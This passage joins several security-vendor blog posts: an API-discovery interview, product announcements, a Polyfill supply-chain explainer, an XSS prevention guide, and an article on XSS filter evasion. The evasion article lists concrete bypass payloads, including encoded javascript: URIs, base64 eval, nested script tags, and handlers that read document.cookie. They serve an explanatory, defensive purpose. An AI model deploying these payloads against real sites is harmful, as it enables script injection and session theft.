Dan: Discovery is needed to find all those pipes that people put in overnight for an urgent project and didn’t necessarily catalog anywhere. And because organizations tend to keep their API information in different places, we decided to build out API discovery in layers. So we’re starting by finding all the spec files we can because these often live in predictable locations or in places that our crawler can get to, and we add those to all the specs that the organization knows and can deliver upfront. Then the next layer are API management platforms like MuleSoft that we can plug into and get more specs. And once we’ve found all the specs we could, we do traffic analysis to find APIs that are deployed and passing traffic but not cataloged.

 

In engineering terms, one of the really cool things we’ve built is the ability to discover APIs from real traffic. For example, one of our discovery features lets us plug into a Kubernetes cluster and analyze the traffic to find API requests. So if, heaven forbid, somebody quietly slipped into production that big water main that happens to make an entire project work, you could now find it by looking at traffic and say, “Oh, wow, you know what? We have these six sets of well-documented APIs, and then we’ve got this one that’s doing two million queries per day that is not on the map.” But we can now build that map, reconstruct the endpoints based on the traffic, build a regular OpenAPI spec file, and feed that to the scanner for testing.

Frank: That’s the other big piece of it—we’re doing discovery to find or reconstruct all those specs, and that is crucial because you can’t secure what you don’t know exists. But once you have all those specs, you need to make sure the APIs are not vulnerable to attack. This is kind of where tools that only focus on discovery can falter because once you have that inventory, you need to test it using some other tool. So at Invicti, we have what many consider to be the best DAST scanner in the world, and we’ve been using it to scan APIs for years, currently supporting 16 different API spec formats. Now that we have API discovery on the same platform, all those specs, known and discovered, can go straight to the scanner and be automatically tested for vulnerabilities without the need for additional tools.

Dan: And the cool thing is we can take many of the hundreds of security checks we designed for testing websites and apply them to scanning APIs. At a very high level, you can think of a DAST scan as just clicking through all the things on site, trying to open every single door, go through all the links, submit all the forms, and then mess around with parameter values until something pops and you get a little bit of cross-site scripting inside the browser. When we have an API spec, we can do something similar and attack all the normal places that we would if we came across this API in the course of a regular web browsing session.

 

But if you try to test an API and you just give it a low-effort payload, you can end up not getting deep enough into the app, and you just get this 400 error that says bad input. Usually, the really juicy code happens a little bit deeper than that, so during scans we’ll also try to mutate things and create representative payloads that match the input that is expected to get the scanner past input validation. You want to get to the point where you’re acquiring that SQL table, where you’re making that call out to the command-line tool—so it’s very important to get as proper-looking inputs as you possibly can. Some things like cross-site scripting probably don’t make sense outside a browser, but you can totally go through an API to steal an AWS identity token via SSRF.

Frank: I think it’s also important to add that we’re continuing work on discovering and testing API so we can find more endpoints, reconstruct more specs, find more vulnerabilities, and ultimately help our customers close those gaps faster.

Want to learn more about API Security, API discovery, and the Invicti platform? Check out our webinar to learn API security challenges, understand the benefits of comprehensive API discovery, and see the Invicti platform with API Security in action!

The post A voyage of discovery: Talking APIs with Frank Catucci and Dan Murphy appeared first on Invicti.

]]>
All in one place: Discovery and security testing across your APIs and applications https://www.invicti.com/blog/web-security/invicti-api-security-with-api-discovery-and-vulnerability-testing/ Tue, 16 Jul 2024 13:22:35 +0000 https://www.invicti.com/?p=54903 API security and application security belong together—and with Invicti’s API Security offering, they come together on one platform that includes discovery, vulnerability testing, and more. Say goodbye to disjointed and inefficient tooling and hello to reduced risk, improved visibility, and lower costs. Learn how Invicti API Security works and why it makes all the difference.

The post All in one place: Discovery and security testing across your APIs and applications appeared first on Invicti.

]]>
Rock and roll. Food and drink. Web application security and API security. Some things are just better together, especially when keeping them separate means inefficiencies, costs, and increased risk. But while nobody has problems combining food and drink, putting API and application security on the same table has been a challenge—until now. With its API Security offering on the Invicti Platform, Invicti now boasts the industry’s first full menu of discovery and dynamic security testing across web applications and APIs to identify and test your entire web attack surface within a single solution.

But enough of the food metaphors. Research shows that most organizations have an average of 26 APIs per app, yet only 25% accurately inventory their APIs. With the increasing number of APIs woven into web applications to speed up the development process, even just keeping tabs on APIs can be a major challenge—and that’s before you get to putting them through security testing in a way that keeps up with the pace of development. Compared to the UI part of applications, APIs are a security weak spot for many organizations, not least because of disjointed tools and processes that keep API security separated from the rest of AppSec. 

To help solve this very real issue plaguing security and development teams, Invicti has launched a new capability within its market-leading API security and application security testing platform: multi-layered API discovery. With discovery bolstering your ability to find APIs, test them for vulnerabilities, and fix security issues before they become expensive security incidents, you get visibility across the entire UI and API attack surface to make AppSec proactive rather than purely reactive. Discovery and security testing. Applications and APIs. It’s like peaches and cream, only better. 

Solving the API and tool sprawl conundrum 

For an idea of the sheer numbers involved, there are hundreds of millions of APIs in existence, handling billions of requests each year. On the popular Postman API platform alone, there are over 120 million API collections, and just from May 2023 to May 2024, 1.29 billion API requests were created. There are APIs everywhere, both managed and unmanaged, and more are being created every minute, presenting a problem for development and security alike: how do you manage and secure all the APIs your organization is running? How can you know your realistic attack exposure? And how do you secure every part of the total attack surface if you can never be certain what you’re exposing? This dire need for visibility fuels tool sprawl and workflow inefficiencies.

Invicti’s new API discovery capability adds that visibility as part of our API Security solution, making it faster and easier to curb the risk from vulnerable APIs deployed in modern web services. Because each application environment is different, Invicti API Security uses a layered approach to API discovery, combining several methods in one tool:

  • A zero-configuration option to get you up and running fast, helping you identify API specifications by scanning your cloud environments for API specification files in known or otherwise typical locations
  • Integrations with popular API management systems so your teams can always sync the latest API specifications 
  • Analysis of network API traffic in container deployments such as Kubernetes clusters to identify API calls and reconstruct API definitions based on the observed traffic

All these layers of discovery are integrated into one Invicti Platform that covers API and web application security, increasing coverage and visibility of your attack surface without throwing yet more tools into the mix. “As tool sprawl and budgetary constraints grow, CISOs can rely on the Invicti solution to address the growing API security concerns in addition to reducing their teams’ tooling complexity,” explains Invicti’s CEO Neil Roseman. 

Now, as the Invicti Platform comes equipped with more comprehensive API discovery capabilities, the combined coverage of web application and API security means leaders don’t have to worry about adding to increasingly complex tool sprawl, breaking their budget, or sacrificing accuracy. In fact, CISOs and engineering leaders can look at Invicti API Security to help reverse tool sprawl and can shift their focus to other critical business needs. 

How automated API discovery fits into the Invicti Platform

Things move fast in development. Agile methodologies and the growing use of AI assistants have dramatically increased the speed and volume of code production, with security often taking a back seat in the rush to bring new features and products to market. Building automated security testing into development pipelines can be a major stumbling block, with subpar tooling and inadequate integration often dragging security efforts down or leaving them by the wayside.

To make efficient security testing a routine part of application and API development, the Invicti Platform was designed with accuracy and automation in mind. Features like proof-based scanning help to confirm exploitable vulnerabilities without the risk of false positives, while a wide array of integrations with industry-standard development and collaboration tools ensures that vulnerability reports are automatically delivered to the right people at the right time. 

The addition of API discovery to the Invicti Platform bridges the gap between known specifications and the real-world attack surface, helping you uncover and test applications and APIs that would otherwise have flown under the radar. Once you’ve defined, discovered, and prioritized your app and API assets, Invicti’s DAST-based approach to vulnerability testing provides technology-agnostic coverage without sacrificing accuracy. 

Putting discovery and security testing within a single cohesive platform for application and API security reduces tool sprawl and gives you unprecedented visibility into the actual security status of your application environments. And with everything under one roof, API discovery can become a seamless and routine part of your wider application security process, ensuring that you have the most accurate information you can get about your APIs.

How API security and application security come together on the Invicti Platform

Deeper insights for proactive risk management and security

Better discovery, accurate testing, and fully integrated remediation are all part of proactive application security efforts that translate into fewer reactive fire drills once in production. Catching issues with web applications and APIs early on in the development process and within a single integrated platform means that both security and development teams are saving time, sanity, and money they would otherwise have lost on chasing security issues using a motley array of disparate tools. 

Being proactive and knowing what to prioritize for testing and remediation can make a world of difference in how effective your security strategy is. Invicti’s recent addition of Predictive Risk Scoring to the Invicti Platform provides advanced prioritization intel to help you decide what to scan and fix first. When deployed with API discovery and web application security testing all in one package and integrated with your existing toolchains, Invicti’s suite of solutions becomes your go-to AppSec platform. 

Learn more about Invicti’s API Security solution, now complete with discovery

Join our webinar to see Invicti API Security in action!

The post All in one place: Discovery and security testing across your APIs and applications appeared first on Invicti.

]]>
Invicti Expands App Security Platform with Comprehensive API Security https://www.invicti.com/blog/news/invicti-expands-appsec-platform-api-security/ Tue, 16 Jul 2024 13:00:25 +0000 https://www.invicti.com/?p=54874 Invicti Security has announced the launch of Invicti API Security, combining comprehensive, multi-layered API discovery with proactive security testing on a single platform that spans applications and APIs.

The post Invicti Expands App Security Platform with Comprehensive API Security appeared first on Invicti.

]]>
Comprehensive API discovery now available in a single web application and API security solution

AUSTIN, Texas—(July 16, 2024)—Invicti, the leading provider of application security testing solutions, today announced Invicti API Security, merging comprehensive API discovery with proactive security testing into a single solution.

The growth of service-based architectures has driven an explosion in APIs, creating yet another expanding attack surface for security teams to address. As development teams embrace the productivity benefits of AI code assistants,  API creation accelerates further. But while AI code assistants are boosting developer productivity, they cannot yet generate secure application code or secure APIs consistently, propagating the risk from vulnerable APIs deployed into today’s web services. 

According to ESG’s report Securing The API Attack Surface, 76% of organizations report having an average of 26 APIs per application deployed. Many of these APIs are undocumented and unmonitored, so the security challenge is now about confidently and quickly finding APIs, testing them for vulnerabilities, and performing remediation. With Invicti API Security, organizations can realize comprehensive API discovery alongside proactive API security testing. 

Invicti API Security includes multiple discovery methods to enable comprehensive identification of known and undocumented APIs, including:

  • Zero-configuration discovery to identify API specifications, scanning cloud environments for accessible paths 
  • API management system integrations to fetch and sync accurate and latest API specifications into inventory
  • Network API traffic analysis to identify and reconstruct API calls into API definition files based on observed traffic

“With the Invicti Platform’s extensive API discovery capabilities, we are able to deliver a tool consolidation option, combining web application and API security into a single solution,” said Neil Roseman, CEO at Invicti. “As tool sprawl and budgetary constraints grow, CISOs can rely on the Invicti solution to address the growing API security concerns in addition to reducing their team’s tool complexity.”

For decades, Invicti has provided the advantage of web application security testing coverage, accuracy, speed, and scale. The combination of continuous automated discovery, proof-based scanning to verify critical vulnerabilities for developers, and recently added Predictive Risk Scoring to advance prioritization efforts provide customers with a unique set of benefits. These web application security benefits can be deployed together with API discovery and security testing.  

“Our research shows that security leaders are increasingly concerned with API security and their ability to secure their customers’ sensitive data. This is because as developers build feature-rich applications with integrations and communications to resources, the APIs, especially unknown shadow APIs, create rapidly proliferating attack surfaces,” said Melinda Marks, Practice Director, Cybersecurity at ESG. “The Invicti approach applies a multi-layer discovery method to thoroughly identify APIs, helping organizations deliver secure applications.”

Invicti API Security is available to Invicti customers across both Acunetix and Invicti (formerly Netsparker) product lines to extend their use of the Invicti platform. New customers can purchase the product as a web application and API security combination, or a standalone API Security option.

About Invicti Security

Invicti Security—which acquired and combined AppSec leaders Acunetix and Netsparker—is on a mission: application security with zero noise. An AppSec leader for more than 15 years, Invicti delivers continuous web application and API security, designed to be both reliable for security and practical for development while serving critical compliance requirements. Customers choose the Invicti platform to leverage DAST, SCA, and IAST solutions to better secure their environments and ultimately reduce risk across their web applications and APIs. Invicti is headquartered in Austin, Texas, and has employees in over 11 countries, serving more than 4,000 organizations around the world. For more information, visit our website or follow us on LinkedIn.

###

Media Contact

Anne Harding
anne@themessagemachine.com
+44 7887 682943

The post Invicti Expands App Security Platform with Comprehensive API Security appeared first on Invicti.

]]>
XSS filter evasion: Why filtering doesn’t stop cross-site scripting https://www.invicti.com/blog/web-security/xss-filter-evasion/ Thu, 11 Jul 2024 10:44:30 +0000 https://www.invicti.com/blog/uncategorized/xss-filter-evasion/ XSS filter evasion techniques allow attackers to get past cross-site scripting filters. This post lists some of the most common filter bypass methods, shows why filtering alone cannot be trusted to stop XSS attacks, and discusses recommended ways to prevent cross-site scripting.

The post XSS filter evasion: Why filtering doesn’t stop cross-site scripting appeared first on Invicti.

]]>
XSS filter evasion covers many hundreds of methods that attackers can use to bypass cross-site scripting (XSS) filters. A successful attack requires both an XSS vulnerability and a way to inject malicious JavaScript into web page code executed by the client to exploit that vulnerability. The idea of XSS filtering is to prevent attacks by finding and blocking (or stripping away) any code that looks like an XSS attempt. The problem is there are countless ways of bypassing such filters, so filtering alone can never fully prevent XSS. Before going into just a few of the thousands of known filter evasion methods, let‘s start with a quick look at the concept and history of XSS filtering.

What is XSS filtering and why is it so hard to do?

At the application level, XSS filtering means user input validation performed specifically to detect and prevent script injection attempts. Filtering can be done locally in the browser, during server-side processing, or by a web application firewall (WAF). For many years, server-side filtering was mostly used, but eventually browser vendors started building in their own filters called XSS auditors to prevent at least some cross-site scripting attempts from reaching the user.

The idea was that the filter scans code arriving at the browser and looks for typical signs of XSS payloads, such as suspicious <script> tags in unexpected places. Common approaches to filtering included complex regular expressions (regex) and code string blacklists. If potentially dangerous code was found, the auditor could block either the entire page or just the suspicious code fragment. Both reactions had their disadvantages and could even open up new vulnerabilities and attack vectors, which is why integrated browser filters soon went away.

All approaches to filtering have their limitations. XSS filtering by the browser is only effective against reflected XSS attacks, where the malicious code injected by the attacker is directly reflected in the client browser. Client-side filters and auditors are no use against XSS where the attack code is not parsed by the browser, including DOM-based XSS and stored XSS. Server-side and WAF-based filters can help against reflected and stored XSS but are helpless against DOM-based attacks since these happen entirely in the browser and the exploit code never arrives at the server. On top of that, trying to do XSS filtering in the web application itself is extremely complicated, can have unintended consequences, and requires constant maintenance to keep up with new exploits.

How attackers bypass cross-site scripting filters

At best, XSS filtering adds an extra level of difficulty to the work of attackers crafting XSS attacks, as any injected script code first has to get past the filters. While XSS attacks generally target application vulnerabilities and misconfigurations, XSS evasion techniques exploit gaps in the filtering performed by the browser, server, or WAF. 

There are numerous evasion approaches that can be combined to build countless bypasses. The common denominator is that they abuse product-specific implementations of web technology specifications. A large part of any browser’s codebase is devoted to gracefully handling malformed HTML, CSS, and JavaScript to try and fix code before presenting it to the user. XSS filter evasion techniques take advantage of this complex tangle of languages, specifications, exceptions, and browser-specific quirks to slip malicious code past the filters.

Examples of XSS filter bypasses

Filter evasion attempts can target any aspect of web code parsing and processing, so there are no rigid categories here and the list is always open. The most obvious script tag injections will generally be rejected out of hand, but there are many more sophisticated methods, and you can also use other HTML tags as injection vectors. Event handlers, in particular, are often used to trigger script loading, as they can be tied into legitimate user actions and are hard to just remove without breaking functionality. Commonly exploited handlers include onerror, onclick, and onfocus, but the majority of supported event handlers can be used as XSS vectors.

To give you some idea of the huge number of ways to bypass an XSS filter, the long list below is still only a tiny fraction of the tools available to attackers (see the OWASP Cheat Sheet for a scarily detailed list based on RSnake’s original cheat sheet). While this post is definitely not a complete reference, and most examples will only work in specific scenarios, anyone familiar with JavaScript should be aware that many such quirks exist alongside what you’d normally consider valid syntax.

Character encoding tricks

To bypass filters that rely on scanning text for specific suspicious strings, attackers have a variety of ways to encode one or many characters. Encodings can also be nested, so you’re encoding the same string many times, potentially using different methods. The choice of encoding is also dependent on the context, as browsers encode and decode characters differently in different places (for example, URL encoding is only supported for URL values in href tags). The following examples show just a few possibilities, and that’s without even resorting to Unicode tricks.

To bypass filters that directly search for a string like javascript:, some or all characters can be written as HTML entities using ASCII codes:

<a href="&
#106;avascript:alert('Successful XSS')">Click this link!</a>

To evade filters that look for HTML entity codes using a pattern of &# followed by a number, you can use ASCII codes but in hexadecimal encoding:

<a href="&
#x6A;avascript:alert(document.cookie)">Click this link!</a>

Base64 encoding can be used to obfuscate attack code. This example also displays an alert saying “Successful XSS”:

<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">

All encoded character entities can be from 1 to 7 numeric characters, with any initial padding zeroes being ignored. This gives each entity in each encoding several extra zero-padded versions (OWASP’s XSS filter evasion cheat sheet lists no less than 70 valid ways of encoding just the < character). Also, note that semicolons are not actually required at the end of entities:

<a href="&
#x6A;avascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>

Character codes can be used to hide XSS payloads:

<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>

Whitespace embedding

Browsers are very permissive when it comes to whitespace in HTML and JavaScript code, so embedded non-printing characters are another way to mess with filters. Note that most browsers no longer fall for such whitespace tricks, though they can still work in some contexts.

Tab characters are ignored when parsing code, so they can be used to break up keywords, as in this img tag (this one won’t work in a modern browser):

<img src="java	script:al	ert('Successful XSS')">

The tabs can also be encoded:

<img src="java&
#x09;script:al&
#x09;ert('Successful XSS')">

Just like tabs, newlines and carriage returns are also ignored and can be additionally encoded:

<a href="jav&
#x0A;ascript:&
#x0A;ale&
#x0D;rt('Successful XSS')">Visit google.com</a>

Some filters may look for "javascript: or 'javascript: and will not expect whitespace after the quote. In reality, any number of spaces and meta characters from 1 through 32 (decimal) will be valid:

<a href="  &#x8; &#23;   javascript:alert('Successful XSS')">Click this link!</a>

Tag manipulation

If the filter simply scans the code once and removes specific tags, such as <script>, nesting them inside other tags will leave valid code after they are removed:

<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>

Spaces between attributes can often be omitted. Also, a slash is a valid separator between the tag name and attribute name, which can be useful to evade whitespace limitations in inputs – note no whitespace in the entire string:

<img/src="funny.jpg"onload=javascript:eval(alert('Successful&#32XSS'))>

And another example without any whitespace, this time using the svg tag:

<svg/onload=alert('XSS')>

If parentheses or single quotes are disallowed, that’s not a problem—replacing them with backticks is still valid JavaScript:

<svg/onload=alert`xss`>

Evasion attempts can also exploit browser efforts to interpret and complete malformed tags. Here’s an example that omits the href attribute and quotes (most other event handlers can also be used): 

<a onmouseover=alert(document.cookie)>Go to google.com</a>

And an extreme example of a completely wrecked img tag that loads a script once repaired by the browser: 

<img """><script src=xssattempt.js></script>">

Extra fun with Internet Explorer

Before there was Chrome or Firefox (and definitely before Edge), there was almost exclusively Internet Explorer. Because of its many non-standard implementations and quirks related to other Microsoft technologies, IE provided some unique filter evasion vectors. And before you dismiss it as an outdated and marginal browser, remember that some legacy enterprise applications may continue to rely on IE-specific features.

The majority of XSS checks look for JavaScript, but Internet Explorer up to IE10 would also accept VBScript:

<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>

Another unique IE feature are dynamic properties that allow script expressions as CSS values:

body { color: expression(alert('Successful XSS')); }

The rare and deprecated dynsrc attribute can provide another vector: 

<img dynsrc="javascript:alert('Successful XSS')">

Use backticks when you need both double and single quotes: 

<img src=`javascript:alert("The name is 'XSS'")`>

In older IE versions, you could also include a script disguised as an external style sheet: 

<link rel="stylesheet" href="http://example.com/xss.css">

Cabinet of curiosities: Legacy methods

Web technology specifications and implementations change so often that XSS filter bypasses naturally have a short shelf life. To end this article, here are some curiosities that shouldn’t work today but provide a glimpse into the many edge cases that can creep up when implementing new specs while also maintaining backward compatibility.

Injection into the background image attribute:

<body background="javascript:alert('Successful XSS')">

Same idea but using a style:

<div style="background-image:url(javascript:alert('Successful XSS'))">

Images without any img tags and with script code instead of the image file:

<input type="image" src="javascript:alert('Successful XSS')">

Script injected as the target URL for a meta tag redirect. In some older browsers, this would display an alert by evaluating the Base64-encoded JavaScript code:

<meta http-equiv="refresh" content="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

And as a final curiosity—did you know that, once upon a time, it was possible to hide an XSS payload using UTF-7 encoding?

<head><meta http-equiv="content-type" content="text/html; charset=utf-7"></head>
+adw-script+ad4-alert('xss');+adw-/script+ad4-

How can you protect your applications from cross-site scripting if not by filtering?

While web application firewalls can provide some XSS filtering, it’s worth keeping in mind that this is, at best, only one of many layers of protection. With hundreds of ways of evading filters and new vectors appearing all the time, filtering alone cannot prevent XSS. Combined with the potential for breaking valid scripts in complex modern applications, this is part of the reason why browser vendors are moving away from filtering.

By writing secure code that is not susceptible to XSS attacks, developers can have far more effect on application and user security than any filters. On the application level, this means treating all user-controlled inputs as untrusted by default and correctly applying context-sensitive escaping and encoding. On the HTTP protocol level, the main weapons against cross-site scripting are properly configured Content Security Policy (CSP) headers and other HTTP security headers.

With these best practices in place, you then also need to regularly test every site, app, and API to make sure that new code, updates, and configuration changes don’t result in exploitable XSS vulnerabilities. Running an enterprise-grade web vulnerability scanner that checks for vulnerabilities and security misconfigurations as part of a continuous process is thus an essential part of application security hygiene.

The post XSS filter evasion: Why filtering doesn’t stop cross-site scripting appeared first on Invicti.

]]>
Polyfill supply chain attack: What to do when your CDN goes evil https://www.invicti.com/blog/web-security/polyfill-supply-chain-attack-when-your-cdn-goes-evil/ Thu, 27 Jun 2024 17:33:26 +0000 https://www.invicti.com/?p=54044 The Polyfill library is just one of many half-forgotten dependencies that the web application world relies on. When its domain changed owners, the CDN serving the library started injecting malware into the code—eventually putting visitors of the 100,000+ sites that use Polyfill at risk of malicious code. Learn how the attack unfolded, why it was possible, and how to mitigate it.

The post Polyfill supply chain attack: What to do when your CDN goes evil appeared first on Invicti.

]]>

What you need to know:

 

  • On June 25, 2024, the cdn.polyfill.io domain started injecting malware into the popular polyfill.js library, estimated to be used by over 100,000 sites.
  • On June 26, Cloudflare started automatically rewriting requests to cdn.polyfill.io and serving up their safe mirrored copy of the library.
  • As of June 27, Invicti products include dedicated security checks to flag any use of polyfill.io in applications.
  • The polyfill.io domain has been taken down (though it may still be cached) and there is no immediate risk of compromise, but all sites and applications that loaded scripts from polyfill.io should remove them as a precaution since the domain is now treated as malicious.
  • A best practice to protect against similar attacks in the future is to use the Subresource Integrity (SRI) feature when loading external dependencies.

The action-packed story of polyfill.io

The open-source Polyfill project was created a decade ago as a convenient aggregation of polyfills for website and web application development. In February 2024, the polyfill.io domain was bought by a suspicious company named Funnull, most likely of Chinese origin. Subsequently, there were some reports of cdn.polyfill.io injecting malware when loaded on mobile devices, but any complaints were quickly deleted from the GitHub repository.

The full-scale supply chain attack was reported on June 25th, with cdn.polyfill.io injecting malicious code into websites that loaded scripts from this domain. Over 100,000 sites were found to be loading poisoned polyfills, serving up a variety of malware to browsers. Major providers such as Google and Cloudflare were quick to respond to mitigate the threat. Cloudflare, in particular, had long been suspicious of the new owners of polyfill.io and had created its own copy of the Polyfill repo. When the attacks started, Cloudflare started rewriting requests to cdn.polyfill.io to point at its own, safe mirror of the repo. Both Cloudflare and Fastly have been providing a safe mirror of Polyfill since February.

As of this writing, the polyfill.io domain has been taken down completely by its operator, eliminating the immediate risk of attack and buying time to remove any references to cdn.polyfill.io from applications that loaded scripts from that domain.

Polyfills are helper scripts (usually JavaScript loaded from a web source) that provide modern functionality for older browser versions that might not support a specific feature. They were a popular tool in the days of limited cross-browser compatibility but are much less useful with modern browsers that implement specifications in a more standardized way. The original creator of the Polyfill project has been discouraging the use of polyfills for several years now, saying they are unnecessary and potentially risky.

Another link in the web application supply chain

“The Polyfill incident serves as yet another illustration of how complex and vulnerable the web application security supply chain has become, particularly in the JavaScript ecosystem on the client side,” said Dan Murphy, Chief Architect at Invicti Security. “The difference here compared to similar high-profile attacks is that malicious actors simply took control of a widely-used project instead of quietly exploiting a vulnerability somewhere in the shaky pyramid of web dependencies.”

Many scripts are now loaded via content delivery networks for improved performance, making CDNs another link in the supply chain and thus a potential target. Without some way of checking if your dependency has been tampered with, you are effectively trusting the CDN operator with your application security.

Using Subresource Integrity to prevent the next Polyfill

Luckily, there is a clever browser feature that can save you in case of an attacker taking over the CDN of one of your dependencies: Subresource Integrity (SRI) checking. Most modern websites work with a very specific set of library versions and once a version has been imported, that’s the one you use, unless a new one is available and you decide to upgrade. It works the other way, too: once a version is published, it is generally not modified. If something needs changing, it’s normally put in a new version that you can use or ignore. In other words, once you have included the file in your application, it should never change—and if it does, there’s something weird going on. 

Enter the Subresource Integrity browser feature that lets you ensure a resource hasn’t changed since you included it in your application. To use SRI, you need to create a hash (sha256, sha384, or sha512) of the file you’re loading, and online tools are available to do it automatically for you. You then simply put the hash in the integrity attribute of your script or link tag, as in this sha384 example for jQuery:

<script src="https://code.jquery.com/jquery-2.1.4.min.js" integrity="sha384-R4/ztc4ZlRqWjqIuvf6RX5yb/v90qNGx6fS48N0tRxiGkqveZETq72KgDVJCp2TC" crossorigin="anonymous"></script>

Once this is done, the resource will load as normal. If anything changes on the server side, however, like if malicious code is added, the stored hash will no longer match the hash of the incoming script or stylesheet and browsers will refuse to load the resource. This protects you not only from malicious tampering but also from CDN-side issues such as misconfigurations or switch-ups that may be hard to debug while impacting the functionality of your website.

Security checks in Invicti products to verify SRI and find Polyfill usage

Invicti products include checks to warn you when a site is not using Subresource Integrity (SRI not implemented at Best-practice severity or Informational severity for the Acunetix equivalent) or an existing SRI hash is wrong (SRI hash invalid, Low severity.)

Both Acunetix and Invicti products now include dedicated security checks to identify any uses of polyfill.io in scanned websites and applications. These are available directly in all Acunetix editions (except Acunetix 360), while Invicti and Acunetix 360 users can enable these custom checks by contacting support.

The post Polyfill supply chain attack: What to do when your CDN goes evil appeared first on Invicti.

]]>
How to prevent XSS attacks https://www.invicti.com/blog/web-security/how-to-prevent-xss-attacks/ Thu, 20 Jun 2024 15:57:43 +0000 https://www.invicti.com/?p=53851 Cross-site scripting vulnerabilities and attacks are not going away any time soon, but with the right combination of security headers, secure coding practices, modern application frameworks, and regular vulnerability testing, you can dramatically reduce the risk of successful XSS attacks against your applications and APIs.

The post How to prevent XSS attacks appeared first on Invicti.

]]>
JavaScript has come a long way since being only lightly sprinkled on static HTML web pages to make them more dynamic. It is now a crucial building block of modern web applications, making cross-site scripting (XSS) a commonplace security vulnerability—and also making XSS attacks that much more impactful if they succeed.

No longer restricted to providing some additional client-side functionality via a handful of scripts, JavaScript code can now run across the entire application stack, up to and including the server side with Node.js. Add to that the plethora of external dependencies loaded at runtime by any self-respecting site and you’re dealing with a tangled web of interconnected scripts—some of which could be vulnerable or even malicious.

Cross-site scripting is a complex and messy area of web application security, which makes it all but impossible to prevent every single attack. (As a side note, while JavaScript is by far the most popular attack vehicle, XSS is also possible with other script types, even including XSS in CSS.) Fortunately, most XSS vulnerabilities and resulting attacks can be prevented by following a handful of security best practices in development and deployment. Let’s start with a cut-out-and-keep checklist before going deeper into selected aspects of XSS.

XSS attack prevention checklist

Follow these best practices to prevent the vast majority of cross-site scripting attacks:

  • Set HTTP security headers: Define the right Content Security Policy (CSP) HTTP response headers to stop malicious scripts from being loaded in the first place.
  • Treat all inputs as untrusted: Always sanitize user inputs (including API inputs and outputs), perform input validation, and use context-dependent output encoding.
  • Use secure coding practices and tools: Avoid inline scripts and correctly use any XSS-resistant features provided by your application framework, such as automatic encoding functions.
  • Run regular vulnerability testing: Periodically rescan your websites and applications with an up-to-date web vulnerability scanner to catch vulnerabilities in time.

(Note that filtering is deliberately not listed here—read on to learn why you can’t trust XSS filtering.)

The complex world of cross-site scripting vulnerabilities

At its core, XSS is a type of injection attack just like SQL injection, except you’re injecting JavaScript code rather than SQL instructions. But unlike SQL injection, where you’re always trying to mess with an SQL query, there are many different types of cross-site scripting, depending on how the malicious code is delivered and executed. The XSS section in Invicti Learn goes into far more detail, but broadly speaking, there are three main types of XSS attacks:

  • Reflected XSS attacks: The classic XSS vulnerability is to take a raw input parameter value from an HTTP request and directly use it in the output, thus reflecting any malicious code from the input and executing it in the victim’s browser. While this is the most common type of XSS, its effects are limited to a single user and browser.
  • Stored XSS attacks: To inject JavaScript into multiple browsers, a malicious hacker can try to slip an XSS payload into a backend resource that will be accessed by many users. If the payload is stored as-is and the web server doesn’t sanitize it upon loading, a single entry in a database or serialized file could result in XSS across thousands of browsers when they load that entry.
  • DOM-based XSS attacks: Instead of preloading all the page code at once, many web applications rewrite their internal document object model (DOM) as the app executes without reloading the page. If an attacker manages to inject malicious JavaScript code into the DOM and have it execute, that code will only ever exist in the user’s browser, making these attacks invisible (and impossible to prevent) on the server side.

The only thing all XSS vulnerabilities have in common is they allow JavaScript code to exist somewhere in the inputs or outputs of an application. So maybe you could simply look out for that code and block it? That’s what XSS filters tried to do—and it didn’t work, in the long run.

Why you can’t trust XSS filtering

Early approaches to XSS prevention relied on stripping out script tags from inputs, starting with DIY filtering functions that eventually grew into heavyweight filters built into the web browser. The problem was that while reliably identifying and blocking a specific payload is easy, creating more general patterns to stop malicious scripts without interfering with legitimate ones proved all but impossible. Our blog post on the rise and fall of XSS Auditor in Google Chrome tells the fascinating story of all the things that can go wrong with XSS filtering (including how it can create its own security vulnerabilities), so check that out for details.

Long story short—XSS filtering doesn’t work and can’t be trusted as your only line of defense against cross-site scripting attacks. While most web application firewalls (WAFs) do have built-in XSS filters that may stop basic probing attacks, XSS filter evasion to bypass WAF rules is the bread and butter of any serious attacker. So, while it doesn’t hurt to have that option enabled if your WAF provides it, you should never rely on any XSS filter to provide useful protection from attacks.

Cross-site scripting in APIs

The stereotypical XSS attack is someone typing <script>alert(1)</script> into a form field or URL parameter—but what about cross-site scripting in modern API-driven apps? With the backend now acting as a separate data provider for any number of frontends communicating with it via APIs, there’s no way to do centralized XSS prevention on the server. API requests that include sensitive data are a valid and attractive target for attackers, making XSS a very real threat even without a form field in sight.

 

Read more about why APIs make XSS prevention a frontend job.

Layered security best practices are the way to prevent XSS

There is no silver bullet to magically protect your apps from cross-site scripting. Especially with full-stack JavaScript applications and the ubiquity of APIs, there are simply too many avenues of attack and too many code interactions to catch them all. And yet, if you follow a handful of secure practices to build up multiple layers of resistance, you can make successful and impactful XSS attacks extremely unlikely.

The winning combination is to dramatically limit your attack surface with the right CSP headers while also using secure coding practices and tools to minimize the number of XSS vulnerabilities that make it to production. Top this off with regular vulnerability scanning using a quality DAST tool and you should have XSS well under control.

 

Frequently asked questions

What is the best way to prevent XSS attacks?

Preventing XSS requires a combination of secure configuration and secure coding practices. Configuring the right Content Security Policy (CSP) header values is the most effective way to quickly improve the security of your website or web application by blocking the loading of unexpected scripts. Input validation and sanitization are also a must, combined with context-sensitive output encoding.

 

Learn more about using Content Security Policy to secure web applications

Can you use filtering to stop XSS attacks?

XSS filtering is never completely effective because attackers have many ways of bypassing WAF rules and getting their XSS payloads to your application. Filtering in the browser or the application itself is also never watertight, requires constant maintenance, and can cause problems with legitimate scripts. While web application firewalls provide some basic XSS filters, they won’t stop more advanced attacks and shouldn’t be relied on as your only line of defense.

 

Learn more about the many possibilities for XSS filter evasion

Does using HttpOnly cookies prevent cross-site scripting?

Setting the HttpOnly flag in cookies is a security measure that makes those cookies inaccessible to client-side scripts but does not actually prevent XSS attacks. Even so, using HttpOnly cookies is a recommended cybersecurity practice to protect session tokens and similar user data from malicious scripts.

 

Learn more about cookie security and security-related cookie flags

Can you prevent cross-site scripting by using a framework like React, Angular, or Vue?

